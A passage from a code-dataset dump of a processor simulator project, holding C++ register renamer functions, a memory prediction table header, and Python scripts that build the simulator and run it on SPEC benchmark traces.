bundle_dst: number of logical destination registers in\r\n\t\t// current rename bundle\r\n\t\t//\r\n\t\t// Return value:there\r\n\t\t// Return \"true\" (stall) if there aren't enough free physical\r\n\t\t// registers to allocate to all of the logical destination registers\r\n\t\t// in the current rename bundle.\r\n\t\t/////////////////////////////////////////////////////////////////////\r\n\t// To find the number of free registers\r\n\t/*uint64_t renamer::numOfFreeRegister() {\r\n\t\tuint64_t freeRegCount = 0;\r\n\t\tfor (int i = 0; i <= (phyRegSize - logRegSize - 1); i++) {\r\n\t\t\tif (fl[i].valid == 1) {\r\n\t\t\t\tfreeRegCount++;\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn freeRegCount;\r\n\t}\r\n*/\r\n\tbool renamer::stall_reg(uint64_t bundle_dst) {\r\n uint64_t freeRegCount = 0;\r\n\t\tfor (int i = 0; i <= (phyRegSize - logRegSize - 1); i++) {\r\n\t\t\tif (fl[i].valid == 1) {\r\n\t\t\t\tfreeRegCount++;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (freeRegCount < bundle_dst) {\r\n\t\t\t//printf(\"Rename Stalled \\n\");\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\telse {\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\t\r\n\t}\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// The Rename Stage must stall if there aren't enough free\r\n\t// checkpoints for all branches in the current rename bundle.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. 
bundle_branch: number of branches in current rename bundle\r\n\t//\r\n\t// Return value:\r\n\t// Return \"true\" (stall) if there aren't enough free checkpoints\r\n\t// for all branches in the current rename bundle.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t//To find the number of empty branch checkpoints\r\n\r\n\t\r\n\tbool renamer::stall_branch(uint64_t bundle_branch) {\r\n \t\tstd::bitset <64> gbmBinary(GBM);\r\n uint64_t freeBranchCount = 0;\r\n\t\tfor (int i = 0; i <= numOfBranch - 1; i++) {\r\n\t\t\tif (gbmBinary[i] == 0) {\r\n\t\t\t\tfreeBranchCount++;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (freeBranchCount < bundle_branch) {\r\n\t\t\t//printf(\"Rename Stalled Branch \\n\");\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\telse {\r\n\t\t\treturn false;\r\n\t\t}\r\n\t}\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function is used to get the branch mask for an instruction.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tuint64_t renamer::get_branch_mask() {\r\n\t\treturn GBM;\r\n\t}\r\n\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function is used to rename a single source re/gister.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. log_reg: the logical register to rename\r\n\t//\r\n\t// Return value: physical register name\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tuint64_t renamer::rename_rsrc(uint64_t log_reg) {\r\n\t\treturn rmt[log_reg];\r\n\t}\r\n\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function is used to rename a single destination register.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. 
log_reg: the logical register to rename\r\n\t//\r\n\t// Return value: physical register name\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tuint64_t renamer::rename_rdst(uint64_t log_reg) {\r\n assert(!stall_reg(1));\r\n \t\tuint64_t phyReg;\r\n phyReg = fl[flHead].physicalReg;\r\n \t\tfl[flHead].valid = 0;\r\n \t\trmt[log_reg] = phyReg;\r\n \t\tphyRegisterReady[phyReg] = 0;\r\n \t\tif (flHead == (phyRegSize - logRegSize - 1))\r\n \t\t{\r\n \t\t\tflHead = 0;\r\n \t\t}\r\n \t\telse {\r\n \t\t\tflHead++;\r\n \t\t}\r\n return phyReg;\r\n\t}\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function creates a new branch checkpoint.\r\n\t//\r\n\t// Inputs: none.\r\n\t//\r\n\t// Output:\r\n\t// 1. The function returns the branch's ID. When the branch resolves,\r\n\t// its ID is passed back to the renamer via \"resolve()\" below.\r\n\t//\r\n\t// Tips:\r\n\t//\r\n\t// Allocating resources for the branch (a GBM bit and a checkpoint):\r\n\t// * Find a free bit -- i.e., a '0' bit -- in the GBM. Assert that\r\n\t// a free bit exists: it is the user's responsibility to avoid\r\n\t// a structural hazard by calling stall_branch() in advance.\r\n\t// * Set the bit to '1' since it is now in use by the new branch.\r\n\t// * The position of this bit in the GBM is the branch's ID.\r\n\t// * Use the branch checkpoint that corresponds to this bit.\r\n\t// \r\n\t// The branch checkpoint should contain the following:\r\n\t// 1. Shadow Map Table (checkpointed Rename Map Table)\r\n\t// 2. checkpointed Free List head index\r\n\t// 3. 
checkpointed GBM\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tuint64_t renamer::checkpoint() {\r\n \tassert(!stall_branch(1));\r\n\t\tstd::bitset\t<64> gbmBinary(GBM);\r\n\t\tuint64_t branchId; // TO BE CHECKED\r\n\t\tfor (int i = 0; i <= numOfBranch - 1; i++) {\r\n\t\t\tif (gbmBinary[i] == 0) {\r\n\t\t\t\tbranchId = i;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tgbmBinary[branchId] = 1;\r\n\t\tGBM = (uint64_t)(gbmBinary.to_ulong());\r\n\t\tbCheckPoint[branchId].freeListHead = flHead;\r\n\t\tbCheckPoint[branchId].GBM = GBM;\r\n for(int i =0; i<= logRegSize-1; i++)\r\n\t\tbCheckPoint[branchId].shadowMapTable[i] = rmt[i];\r\n\t\treturn branchId;\r\n\t}\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions related to Dispatch Stage. //\r\n\t//////////////////////////////////////////\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// The Dispatch Stage must stall if there are not enough free\r\n\t// entries in the Active List for all instructions in the current\r\n\t// dispatch bundle.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. 
bundle_inst: number of instructions in current dispatch bundlethere\r\n\t//\r\n\t// Return value:\r\n\t// Return \"true\" (stall) if the Active List does not have enough\r\n\t// space for all instructions in the dispatch bundle.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// To find the number of free Active List registers\r\n\r\n\r\n\r\n\tbool renamer::stall_dispatch(uint64_t bundle_inst) {\r\n uint64_t freeRegCount = 0;\r\n\t\t for (int i = 0; i <= (phyRegSize - logRegSize - 1); i++) {\r\n\t\t\t if (actList[i].valid == 0) {\r\n\t\t\t\tfreeRegCount++;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (freeRegCount < bundle_inst) {\r\n\t\t\t//printf(\"Dispatch Stalled \\n\");\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\telse {\r\n\t\t\treturn false;\r\n\t\t}\r\n\t}\r\n\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function dispatches a single instruction into the Active\r\n\t// List.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. dest_valid: If 'true', the instr. has a destination register,\r\n\t// otherwise it does not. If it does not, then the log_reg and\r\n\t// phys_reg inputs should be ignored.\r\n\t// 2. log_reg: Logical register number of the instruction's\r\n\t// destination.\r\n\t// 3. phys_reg: Physical register number of the instruction's\r\n\t// destination.\r\n\t// 4. load: If 'true', the instr. is a load, otherwise it isn't.\r\n\t// 5. store: If 'true', the instr. is a store, otherwise it isn't.\r\n\t// 6. branch: If 'true', the instr. is a branch, otherwise it isn't.\r\n\t// 7. amo: If 'true', this is an atomic memory operation.\r\n\t// 8. csr: If 'true', this is a system instruction.\r\n\t// 9. 
PC: Program counter of the instruction.\r\n\t//\r\n\t// Return value:\r\n\t// Return the instruction's index in the Active List.\r\n\t//\r\n\t// Tips:\r\n\t//\r\n\t// Before dispatching the instruction into the Active List, assert\r\n\t// that the Active List isn't full: it is the user's responsibility\r\n\t// to avoid a structural hazard by calling stall_dispatch()\r\n\t// in advance.\r\n\t/////////////////////////////////////////////////////////////////////\r\n uint64_t renamer::dispatch_inst(bool dest_valid,\r\n\t\tuint64_t log_reg,\r\n\t\tuint64_t phys_reg,\r\n\t\tbool load,\r\n\t\tbool store,\r\n\t\tbool branch,\r\n\t\tbool amo,\r\n\t\tbool csr,\r\n\t\tuint64_t PC) {\r\n\t\tuint64_t activeIndex;\r\n\t\tassert(!stall_dispatch(1));\r\n\t\tif (dest_valid) {\r\n\t\t\tactList[alTail].logicalRegister = log_reg;\r\n\t\t\tactList[alTail].physicalRegister = phys_reg;\r\n //phyRegisterReady[phys_reg] = 0;\r\n }\r\n else{\r\n }\r\n actList[alTail].destinationFlag = dest_valid;\r\n\t\tactList[alTail].loadFlag = load;\r\n\t\tactList[alTail].storeFlag = store;\r\n\t\tactList[alTail].branchFlag = branch;\r\n\t\tactList[alTail].amoFlag = amo;\r\n\t\tactList[alTail].csrFlag = csr;\r\n\t\tactList[alTail].pc = PC;\r\n\t\tactList[alTail].valid = 1;\r\n actList[alTail].ready = 0;\r\n actList[alTail].exception = 0;\r\n actList[alTail].loadViolationBit = 0;\r\n actList[alTail].branchMispredictionBit = 0;\r\n actList[alTail].valueMispredictionBit = 0;\r\n \r\n\t\tactiveIndex = alTail;\r\n\t\tif (alTail == phyRegSize - logRegSize - 1) {\r\n\t\t\talTail = 0;\r\n\t\t}\r\n\t\telse {\r\n\t\t\talTail++;\r\n\t\t}\r\n\t\treturn activeIndex;\r\n\t}\r\n\r\n\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions related to Schedule Stage. 
//\r\n\t//////////////////////////////////////////\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Test the ready bit of the indicated physical register.\r\n\t// Returns 'true' if ready.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tbool renamer::is_ready(uint64_t phys_reg) {\r\n\t\tif (phyRegisterReady[phys_reg] == 1) {\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\telse {\r\n\t\t\treturn false;\r\n\t\t}\r\n\t}\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Clear the ready bit of the indicated physical register.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::clear_ready(uint64_t phys_reg) {\r\n\t\tphyRegisterReady[phys_reg] = 0;\r\n\t}\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Set the ready bit of the indicated physical register.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::set_ready(uint64_t phys_reg){\r\n\t\tphyRegisterReady[phys_reg] = 1;\r\n\t\t//if(phys_reg == 197)\r\n\t\t\t//printf(\"Destination Ready bit set for phy mapping 197 of inst 154 \\n\");\r\n\t}\r\n\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions related to Reg. 
Read Stage.//\r\n\t//////////////////////////////////////////\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Return the contents (value) of the indicated physical register.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tuint64_t renamer::read(uint64_t phys_reg) {\r\n\t\treturn phyList[phys_reg];\r\n\t}\r\n\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions related to Writeback Stage.//\r\n\t//////////////////////////////////////////\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Write a value into the indicated physical register.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::write(uint64_t phys_reg, uint64_t value) {\r\n\t\tif (phys_reg == 266) {\r\n\t\t\t//printf(\"Destination Value : %d \\n\", value);\r\n\t\t}\r\n\t\tphyList[phys_reg] = value;\r\n\t}\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Set the completed bit of the indicated entry in the Active List.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::set_complete(uint64_t AL_index) {\r\n\t\tactList[AL_index].ready = 1;\r\n\t}\r\n\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function is for handling branch resolution.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. AL_index: Index of the branch in the Active List.\r\n\t// 2. branch_ID: This uniquely identifies the branch and the\r\n\t// checkpoint in question. It was originally provided\r\n\t// by the checkpoint function.\r\n\t// 3. 
correct: 'true' indicates the branch was correctly\r\n\t// predicted, 'false' indicates it was mispredicted\r\n\t// and recovery is required.\r\n\t//\r\n\t// Outputs: none.\r\n\t//\r\n\t// Tips:\r\n\t//\r\n\t// While recovery is not needed in the case of a correct branch,\r\n\t// some actions are still required with respect to the GBM and\r\n\t// all checkpointed GBMs:\r\n\t// * Remember to clear the branch's bit in the GBM.\r\n\t// * Remember to clear the branch's bit in all checkpointed GBMs.\r\n\t//\r\n\t// In the case of a misprediction:\r\n\t// * Restore the GBM from the checkpoint. Also make sure the\r\n\t// mispredicted branch's bit is cleared in the restored GBM,\r\n\t// since it is now resolved and its bit and checkpoint are freed.\r\n\t// * You don't have to worry about explicitly freeing the GBM bits\r\n\t// and checkpoints of branches that are after the mispredicted\r\n\t// branch in program order. The mere act of restoring the GBM\r\n\t// from the checkpoint achieves this feat.\r\n\t// * Restore other state using the branch's checkpoint.\r\n\t// In addition to the obvious state ... *if* you maintain a\r\n\t// freelist length variable (you may or may not), you must\r\n\t// recompute the freelist length. It depends on your\r\n\t// implementation how to recompute the length.\r\n\t// (Note: you cannot checkpoint the length like you did with\r\n\t// the head, because the tail can change in the meantime;\r\n\t// you must recompute the length in this function.)\r\n\t// * Do NOT set the branch misprediction bit in the active list.\r\n\t// (Doing so would cause a second, full squash when the branch\r\n\t// reaches the head of the Active List. 
We don’t want or need\r\n\t// that because we immediately recover within this function.)\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::resolve(uint64_t AL_index,\r\n\t\tuint64_t branch_ID,\r\n\t\tbool correct) {\r\n\t\tif (correct) {\r\n\t\t\t\r\n\t\t\t//to clear the branch's bit in the GBM.\r\n\t\t\tstd::bitset\t<64> gbmBinary(GBM);\r\n\t\t\tgbmBinary[branch_ID] = 0;\r\n\t\t\tGBM = (uint64_t)(gbmBinary.to_ulong());\r\n\t\t\t\r\n\r\n\t\t\t//to clear the branch's bit in all checkpointed GBMs.\r\n\t\t\tfor (int i = 0; i <= numOfBranch - 1; i++) {\r\n\t\t\t\tstd::bitset\t<64> gbmCheckpointBinary(bCheckPoint[i].GBM);\r\n\t\t\t\tgbmCheckpointBinary[branch_ID] = 0;\r\n\t\t\t\tbCheckPoint[i].GBM = (uint64_t)(gbmCheckpointBinary.to_ulong());\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t\telse {\r\n //assert(0);\r\n\t\t\tGBM = bCheckPoint[branch_ID].GBM;\r\n\t\t\tstd::bitset\t<64> gbmBinary(GBM);\r\n\t\t\tgbmBinary[branch_ID] = 0;\r\n\t\t\tGBM = (uint64_t)(gbmBinary.to_ulong());\r\n\t\t\t\r\n\t\t\t// restoring rmt\r\n for(int i=0; i<=logRegSize-1; i++)\r\n\t\t\trmt[i] = bCheckPoint[branch_ID].shadowMapTable[i];\r\n\r\n\t\r\n\r\n if(flHead > flTail){\r\n for(int i = bCheckPoint[branch_ID].freeListHead ;i<flHead; i++)\r\n fl[i].valid = 1;\r\n }\r\n else{\r\n\t if(bCheckPoint[branch_ID].freeListHead > flHead){\r\n for(int i =bCheckPoint[branch_ID].freeListHead; i<=(phyRegSize - logRegSize - 1); i++)\r\n fl[i].valid = 1;\r\n \r\n for(int i =0; i<flHead; i++)\r\n fl[i].valid = 1;\r\n }\r\n \telse{\r\n\t\t for(int i = bCheckPoint[branch_ID].freeListHead ;i<flHead; i++)\r\n \tfl[i].valid = 1;\r\n \t\t}\r\n\t } \r\n flHead = bCheckPoint[branch_ID].freeListHead;\r\n \r\n\r\n\r\n\t\t\t\r\n\r\n\t\t\t// restoring tail pointer of active list\r\n\r\n\t\t\tif (alTail > alHead) {\r\n\t\t\t\tfor (int i = AL_index + 1; i < alTail; i++) {\r\n\t\t\t\t\tactList[i].valid = 0;\r\n\t\t\t\t}\r\n\t\t\t\talTail = AL_index + 1;\r\n\t\t\t}\r\n\t\t\telse 
{\r\n\t\t\t\tif(AL_index < alTail){\r\n\t\t\t\t\tfor (int i = AL_index + 1; i < alTail; i++) {\r\n\t\t\t\t\t\tactList[i].valid = 0;\r\n\t\t\t\t\t}\r\n\t\t\t\t\talTail = AL_index + 1;\r\n\t\t\t\t}\r\n\t\t\t\telse {\r\n if(AL_index == phyRegSize-logRegSize-1){\r\n\t\t\t\t\t for (int i = 0; i < alTail; i++) {\r\n\t\t\t\t\t\t actList[i].valid = 0;\r\n\t\t\t\t\t }\r\n\t\t\t\t\t alTail = 0;\r\n }\r\n else{\r\n for(int i= AL_index+1; i<=phyRegSize-logRegSize-1; i++){\r\n actList[i].valid = 0;\r\n }\r\n for(int i=0; i<alTail; i++){\r\n actList[i].valid = 0;\r\n }\r\n alTail = AL_index + 1;\r\n }\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\r\n\t\t}\r\n\r\n\t}\r\n\r\n\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions related to Retire Stage. //\r\n\t//////////////////////////////////////////\r\n\r\n\t///////////////////////////////////////////////////////////////////\r\n\t// This function allows the caller to examine the instruction at the head\r\n\t// of the Active List.\r\n\t//\r\n\t// Input arguments: none.\r\n\t//\r\n\t// Return value:\r\n\t// * Return \"true\" if the Active List is NOT empty, i.e., there\r\n\t// is an instruction at the head of the Active List.\r\n\t// * Return \"false\" if the Active List is empty, i.e., there is\r\n\t// no instruction at the head of the Active List.\r\n\t//\r\n\t// Output arguments:\r\n\t// Simply return the following contents of the head entry of\r\n\t// the Active List. These are don't-cares if the Active List\r\n\t// is empty (you may either return the contents of the head\r\n\t// entry anyway, or not set these at all).\r\n\t// * completed bit\r\n\t// * exception bit\r\n\t// * load violation bit\r\n\t// * branch misprediction bit\r\n\t// * value misprediction bit\r\n\t// * load flag (indicates whether or not the instr. is a load)\r\n\t// * store flag (indicates whether or not the instr. is a store)\r\n\t// * branch flag (indicates whether or not the instr. is a branch)\r\n\t// * amo flag (whether or not instr. 
is an atomic memory operation)\r\n\t// * csr flag (whether or not instr. is a system instruction)\r\n\t// * program counter of the instruction\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tbool renamer::precommit(bool &completed,\r\n\t\tbool &exception, bool &load_viol, bool &br_misp, bool &val_misp,\r\n\t\tbool &load, bool &store, bool &branch, bool &amo, bool &csr,\r\n\t\tuint64_t &PC) {\r\n \r\n if (actList[alHead].valid == 1) {\r\n\t\t\tcompleted = actList[alHead].ready;\r\n\t\t\texception = actList[alHead].exception;\r\n\t\t\tload_viol = actList[alHead].loadViolationBit;\r\n\t\t br_misp = actList[alHead].branchMispredictionBit;\r\n\t\t\tval_misp = actList[alHead].valueMispredictionBit;\r\n\t\t\tload = actList[alHead].loadFlag;\r\n\t\t\tstore = actList[alHead].storeFlag;\r\n\t\t\tbranch = actList[alHead].branchFlag;\r\n\t\t\tamo = actList[alHead].amoFlag;\r\n\t\t\tcsr = actList[alHead].csrFlag;\r\n\t\t\tPC = actList[alHead].pc;\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\telse {\r\n\t\t\treturn false;\r\n\t\t}\r\n \r\n\t}\r\n\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function commits the instruction at the head of the Active List.\r\n\t//\r\n\t// Tip (optional but helps catch bugs):\r\n\t// Before committing the head instruction, assert that it is valid to\r\n\t// do so (use assert() from standard library). 
Specifically, assert\r\n\t// that all of the following are true:\r\n\t// - there is a head instruction (the active list isn't empty)\r\n\t// - the head instruction is completed\r\n\t// - the head instruction is not marked as an exception\r\n\t// - the head instruction is not marked as a load violation\r\n\t// It is the caller's (pipeline's) duty to ensure that it is valid\r\n\t// to commit the head instruction BEFORE calling this function\r\n\t// (by examining the flags returned by \"precommit()\" above).\r\n\t// This is why you should assert() that it is valid to commit the\r\n\t// head instruction and otherwise cause the simulator to exit.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::commit() {\r\n\t\tassert((actList[alHead].valid == 1));\r\n assert((actList[alHead].ready == 1));\r\n assert((actList[alHead].exception == 0) );\r\n assert((actList[alHead].loadViolationBit == 0));\r\n if(actList[alHead].destinationFlag == true){\r\n \t\t\r\n // Copying existing phy Mapping from AMT to Free List\r\n \t\tfl[flTail].physicalReg = amt[actList[alHead].logicalRegister];\r\n \t\tfl[flTail].valid = 1;\t\r\n phyRegisterReady[amt[actList[alHead].logicalRegister]] = 0;\r\n \t\t\r\n if (flTail == (phyRegSize - logRegSize - 1)) {\r\n \t\t\tflTail = 0;\r\n \t\t}\r\n \t\telse {\r\n \t\t\tflTail++;\r\n \t\t}\r\n \r\n \r\n \r\n \t\t// Copying new committed mapping from active list head to amt\r\n \t\tamt[actList[alHead].logicalRegister] = actList[alHead].physicalRegister;\r\n \r\n }\r\n else{\r\n }\r\n \tactList[alHead].valid = 0;\r\n\t\tif (alHead == (phyRegSize - logRegSize -1)) {\r\n\t\t\talHead = 0;\r\n\t\t}\r\n\t\telse {\r\n\t\t\talHead++;\r\n\t\t}\r\n \r\n\t}\r\n\r\n\t//////////////////////////////////////////////////////////////////////\r\n\t// Squash the renamer class.\r\n\t//\r\n\t// Squash all instructions in the Active List and think about which\r\n\t// sructures in your renamer class need to be restored, and 
how.\r\n\t//\r\n\t// After this function is called, the renamer should be rolled-back\r\n\t// to the committed state of the machine and all renamer state\r\n\t// should be consistent with an empty pipeline.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::squash() {\r\n //assert(0);\r\n\t\t// Squashing All Instructions in Active List\r\n\t\talTail = alHead;\r\n\t\tfor (int i = 0; i <= phyRegSize - logRegSize - 1; i++) {\r\n\t\t\tactList[i].valid = 0;\r\n\t\t}\r\n\r\n\t\t// Restoring rmt from amt\r\n for(int i=0; i<=(logRegSize-1); i++)\r\n\t\trmt[i] = amt[i];\r\n\r\n\t\t// Restoring branch checkpoints\r\n\t\tGBM = 0;\r\n\r\n\t\t// Restoring Free List\r\n\t\tflHead = flTail;\r\n\t\tfor (int i = 0; i <= (phyRegSize - logRegSize - 1); i++) {\r\n\t\t\tfl[i].valid = 1;\r\n\t\t}\r\n\r\n\t\t// Restoring physical Ready Bits\r\n\t\tfor (int i = 0; i <= phyRegSize - logRegSize - 1; i++) {\r\n\t\t\t//phyRegisterReady[fl[i].physicalReg] = 0;\r\n\t\t\tphyRegisterReady[i] = 0;\r\n\r\n\r\n\t\t}\r\n\r\n\t\tfor (int i = 0; i <= (logRegSize - 1); i++)\r\n\t\tphyRegisterReady[amt[i]] = 1;\r\n\r\n\t}\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions not tied to specific stage.//\r\n\t//////////////////////////////////////////\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Functions for individually setting the exception bit,\r\n\t// load violation bit, branch misprediction bit, and\r\n\t// value misprediction bit, of the indicated entry in the Active List.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::set_exception(uint64_t AL_index) {\r\n\t\tactList[AL_index].exception = 1;\r\n\t}\r\n\tvoid renamer::set_load_violation(uint64_t AL_index) {\r\n\t\tactList[AL_index].loadViolationBit = 1;\r\n\t}\r\n\tvoid renamer::set_branch_misprediction(uint64_t AL_index) {\r\n\t\tactList[AL_index].branchMispredictionBit = 1;\r\n\t}\r\n\tvoid 
renamer::set_value_misprediction(uint64_t AL_index) {\r\n\t\tactList[AL_index].valueMispredictionBit = 1;\r\n\t}\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Query the exception bit of the indicated entry in the Active List.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tbool renamer::get_exception(uint64_t AL_index) {\r\n\t\treturn actList[AL_index].exception;\r\n\t}\r\n\r\n\r\n" }, { "alpha_fraction": 0.677994430065155, "alphanum_fraction": 0.6857938766479492, "avg_line_length": 22.256755828857422, "blob_id": "120d51eb14773c6b281e2e98ad87d5d5b9991f27", "content_id": "e9e2d5854301e3572d91520c084b6c2c0c6af704", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1795, "license_type": "no_license", "max_line_length": 78, "num_lines": 74, "path": "/721sim-partial/uarchsim/mpt.h", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "#include \"pipeline.h\"\r\n\r\ntypedef struct {\r\n\r\n\tbool valid;\r\n\tunsigned int effective_address;\r\n\tint stride;\r\n\tint shb;\r\n\tunion64_t value;\r\n\tbool valid_value;\r\n\tunsigned int next_predicted_address;\r\n\tint pred_count; // Count for multiple outstanding prediction\r\n \tint dispatch_conf; // #cycles for getting ready and issued\r\n\r\n} mpt_table;\r\n\r\n//Forward declaring classes\r\nclass pipeline_t;\r\nclass payload;\r\nclass stats_t;\r\n\r\nclass mpt {\r\nprivate:\r\n\tpipeline_t* proc;\r\n\tmpt_table* mp_table;\r\n\tint size; // always powers of 2\r\n\r\n\r\npublic:\r\n\r\n int confident_and_correct= 0;\r\n int confident_and_incorrect= 0;\r\n int not_confident_and_correct= 0;\r\n int not_confident_and_incorrect= 0;\r\n \r\n\tint delay_one_to_five = 0;\r\n\tint delay_five_to_ten = 0;\r\n\tint delay_ten_to_fifty = 0;\r\n\tint delay_fifty_to_seventy_five = 0;\r\n\tint delay_seventy_five_to_hundred = 0;\r\n\tint delay_more_than_hundred = 
0;\r\n\r\n\t// Constructor\r\n\tmpt(unsigned int size);\r\n\r\n\t// Read the mpt for matching Load/Store entry in the Fetch stage\r\n\tbool read_entry(unsigned int pc);\r\n\r\n\t// Create a new entry in the mpt after AGEN/RETIRE stage\r\n\tvoid create_entry(reg_t addr, unsigned int pc);\r\n\r\n\t// Is Address Predictable\r\n\tbool is_addr_predictable(unsigned int pc);\r\n\r\n\t// Predict Address\r\n\tunsigned int predict_address(unsigned int pc);\r\n\r\n\t// Predict Next Address\r\n\tunsigned int predict_next_addr (unsigned int pc);\r\n\r\n\t// Update an existing entry in MPT after RETIRE\r\n\tvoid update_entry(reg_t current_addr, unsigned int pc, int inst_issue_delay);\r\n\r\n\t// Set confidence to 0 on misprediction\r\n\tvoid set_confidence_low(unsigned int pc);\r\n\r\n\t// Resect all prediction Counts to zer on squash\r\n\tvoid squash_pred_count();\r\n\r\n\tvoid dec_pred_count(unsigned int pc);\r\n\r\n\tvoid inc_pred_count(unsigned int pc);\r\n\r\n};\r\n" }, { "alpha_fraction": 0.4333810806274414, "alphanum_fraction": 0.5938395261764526, "avg_line_length": 34.79487228393555, "blob_id": "077c8a37411e1a073381d23bf9b6984102b46335", "content_id": "c9def8783111837f562bcfd8047746739643bb61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1396, "license_type": "no_license", "max_line_length": 167, "num_lines": 39, "path": "/721sim-partial/uarchsim/wrapper_1.py", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "import os\nimport sys\n\nos.system(\"make clean\")\nos.system(\"make\")\n\n\nlist = []\n'''list.append('456.hmmer_test.74.0.22.gz') \nlist.append('473.astar_test.76.0.22.gz') \nlist.append('401.bzip2_dryer_test.53.0.35.gz')'''\nlist.append('410.bwaves_test.370.0.45.gz') \nlist.append('473.astar_ref.871.0.43.gz') \nlist.append('473.astar_rivers_ref.2890.0.28.gz') \n'''list.append('429.mcf_test.7.0.38.gz') \nlist.append('473.astar_rivers_ref.322.0.20.gz') 
\nlist.append('433.milc_test.74.0.30.gz') ''' \n'''list.append('473.astar_rivers_ref.5883.0.20.gz') \nlist.append('437.leslie3d_test.152.0.25.gz') \nlist.append('444.namd_test.84.0.21.gz') \nlist.append('483.xalancbmk_test.2.0.33.gz') \nlist.append('445.gobmk_ref.2465.0.18.gz') \nlist.append('453.povray_ref.2301.0.24.gz') \nlist.append('458.sjeng_test.24.0.24.gz') \nlist.append('462.libquantum_ref.13679.0.28.gz') \nlist.append('464.h264ref_ref.1989.0.46.gz') \nlist.append('465.tonto_test.22.0.29.gz') \nlist.append('471.omnetpp_test.6.0.58.gz')'''\n\n#filename = \"output.txt\"\n#open(filename, 'w').close()\n\n\nfor i in list:\n\tcmd = \"./721sim --disambig=0,1 --perf=0,0,0,0 --fq=128 --cp=64 --al=512 --lsq=256 --iq=128 --iqnp=4 --fw=16 --dw=16 --iw=16 --rw=16 -m2048 -e100000000 -c\" + i + \" pk\"\n\n\tprint(cmd)\n\n\tos.system(cmd)\n" }, { "alpha_fraction": 0.42937853932380676, "alphanum_fraction": 0.5790960192680359, "avg_line_length": 26.230770111083984, "blob_id": "dcc91141efe0bad5d5b9cbfdb996a23b6d02dcf0", "content_id": "bfb3e8ea752170a73e25669dcdd1cb91db72fe1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 708, "license_type": "no_license", "max_line_length": 200, "num_lines": 26, "path": "/721sim-partial/uarchsim/wrapper4.py", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "import os\nimport sys\n\nos.system(\"make clean\")\nos.system(\"make\")\n\n\nlist = []\n\nlist.append('453.povray_ref.2301.0.24.gz') \nlist.append('458.sjeng_test.24.0.24.gz') \nlist.append('462.libquantum_ref.13679.0.28.gz') \nlist.append('464.h264ref_ref.1989.0.46.gz') \nlist.append('465.tonto_test.22.0.29.gz') \nlist.append('471.omnetpp_test.6.0.58.gz')\n\n#filename = \"output.txt\"\n#open(filename, 'w').close()\n\n\nfor i in list:\n\tcmd = \"./721sim --disambig=0,1 --perf=0,0,0,0,0 --vflags=0,1,0,1 --vp=2 --psize=1024 --fq=64 --cp=32 --al=256 --lsq=128 